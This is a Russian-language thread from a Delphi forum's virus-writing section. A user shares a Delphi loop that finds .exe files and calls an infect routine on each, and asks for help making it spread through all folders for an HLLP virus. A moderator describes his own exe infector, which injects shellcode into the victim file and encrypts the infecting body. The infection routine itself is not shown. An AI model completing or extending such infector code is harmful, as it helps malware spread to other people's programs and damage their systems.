Пятница, 27.09.2013, 05:03 Приветствую вас Гость | Группа "Гости" 


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 1 1
Модератор форума: C@T  
delfcode » Delphi » Вирусология Delphi » HLLP СРОЧНО! (Очень нужна помощь!)
HLLP СРОЧНО!
Slash Дата: Пятница, 11.01.2013, 21:59 | Сообщение # 1
Постоянный
Зарегистрирован: 20.12.2012
Группа: Пользователи
Сообщений: 109
Статус: Offline
var
FR : INTEGER;
sr:tsearchrec;
begin
DeleteFile(TmpName);
FR:=FindFirst('*.exe',faAnyFile-faDirectory,SR);
while FR=0 do
begin
if CheckInfect(SR.Name) then
infect(SR.Name);
FR:=findnext(SR);
end;
InRun;
end.

Вот поиск и заражение,правьте чтоб искала во всех папках и подпапках!


Delphi-the best. Fuck off all the rest!
 
ms301 Дата: Пятница, 11.01.2013, 22:01 | Сообщение # 2
Частый гость
Зарегистрирован: 28.11.2012
Группа: Пользователи
Сообщений: 56
Статус: Offline
Это приказ? biggrin

)_DubStep_(
 
Slash Дата: Пятница, 11.01.2013, 22:08 | Сообщение # 3
Постоянный
Зарегистрирован: 20.12.2012
Группа: Пользователи
Сообщений: 109
Статус: Offline
Цитата (ms301)
Это приказ?

HET!
Но нужно срочно!

Delphi-the best. Fuck off all the rest!
 
ms301 Дата: Пятница, 11.01.2013, 22:22 | Сообщение # 4
Частый гость
Зарегистрирован: 28.11.2012
Группа: Пользователи
Сообщений: 56
Статус: Offline
да и процедура заражения тут не описана +_+

Добавлено (11.01.2013, 22:22)
---------------------------------------------
Вот рабочий пример.



)_DubStep_(
 
Slash Дата: Пятница, 11.01.2013, 22:23 | Сообщение # 5
Постоянный
Зарегистрирован: 20.12.2012
Группа: Пользователи
Сообщений: 109
Статус: Offline
Цитата (ms301)
да и процедура заражения тут не описана +_+
Добавлено (11.01.2013, 22:22)
---------------------------------------------
Вот рабочий пример.


Да мне не это надо,мой код поправь!

Delphi-the best. Fuck off all the rest!
 
ms301 Дата: Пятница, 11.01.2013, 22:48 | Сообщение # 6
Частый гость
Зарегистрирован: 28.11.2012
Группа: Пользователи
Сообщений: 56
Статус: Offline
Поиск. Взял на этом сайте, за что отдельное спасибо автору-помог мне с курсачем biggrin

А заражение-ХЗ как ты там заражаешь....


)_DubStep_(

Сообщение отредактировал ms301 - Пятница, 11.01.2013, 22:51
 
Don_Diego Дата: Пятница, 11.01.2013, 23:56 | Сообщение # 7
Продвинутый
Зарегистрирован: 16.04.2012
Группа: Проверенные
Сообщений: 248
Статус: Offline
https://delfcode.ru/forum/10-922-1
 
C@T Дата: Суббота, 12.01.2013, 04:36 | Сообщение # 8
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 260
Статус: Offline
https://delfcode.ru/forum/10-324-1
блин, давным давно писал крутой пример заражения ехе, все свел к одной процедуре,

procedure Infect(FileName:string;SeacondFileName:string);
FileName - файл который заразить
SeacondFileName - файл которым заразить

в результате работы функции появлятся файл infected.exe, при запуске которого выполнялся сперва файл которым заразили, а потом файл который заразили, все заражение проходило инжектом ассемблерного шелл кода в последнюю секцию жертвы, при чем тело файла которым заражали криптовалось и размер был равен, первый файл + второй файл + 800 байт
вылодил все исходники и никто не пользуется, обидно даже :/

З.Ы на представлненный код не ругайтесь, писалось давно, я тогда только 9-й класс закончил biggrin


 
C@T Дата: Суббота, 12.01.2013, 04:43 | Сообщение # 9
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 260
Статус: Offline
Цитата (Slash)
Вот поиск и заражение,правьте чтоб искала во всех папках и подпапках!

ознакомится с понятием рекурсии wink

 
Slash Дата: Суббота, 12.01.2013, 15:23 | Сообщение # 10
Постоянный
Зарегистрирован: 20.12.2012
Группа: Пользователи
Сообщений: 109
Статус: Offline
Спасибо всем ребята,реально помогли! biggrin

Delphi-the best. Fuck off all the rest!
 
Anton93 Дата: Пятница, 13.09.2013, 10:38 | Сообщение # 11
Постоянный
Зарегистрирован: 06.01.2010
Группа: Проверенные
Сообщений: 111
Статус: Offline
C@T,
Цитата
З.Ы на представленный код не ругайтесь, писалось давно, я тогда только 9-й класс закончил

в девятом классе я мог только мечтать о писании на ASM


Delphi Lite, Flat Assembler, PHP.
 
dolphin Дата: Пятница, 13.09.2013, 13:12 | Сообщение # 12
Администратор
Сообщений: 944
Статус: Offline
ОФФТОП для Anton93



Система: Windows 7 x64, Windows XP
Delphi: 7, XE2, XE4

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик.
 
Don_Diego Дата: Пятница, 13.09.2013, 20:52 | Сообщение # 13
Продвинутый
Зарегистрирован: 16.04.2012
Группа: Проверенные
Сообщений: 248
Статус: Offline
Оффтоп
 
Slash Дата: Суббота, 14.09.2013, 17:43 | Сообщение # 14
Постоянный
Зарегистрирован: 20.12.2012
Группа: Пользователи
Сообщений: 109
Статус: Offline
Теме 100 лет, с тем HLLP справился уже довольно давно. Тему можно закрывать.

Delphi-the best. Fuck off all the rest!
 
delfcode » Delphi » Вирусология Delphi » HLLP СРОЧНО! (Очень нужна помощь!)
Страница 1 из 1 1
Поиск:

delfcode.ru © 2008 - 2013 Хостинг от uCoz